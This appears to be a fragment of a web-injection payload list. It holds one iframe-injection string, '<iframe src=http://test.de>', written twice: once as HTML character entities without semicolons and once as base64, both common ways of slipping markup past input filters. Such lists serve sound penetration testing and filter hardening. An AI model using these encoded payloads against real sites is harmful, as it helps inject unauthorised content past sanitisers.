&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
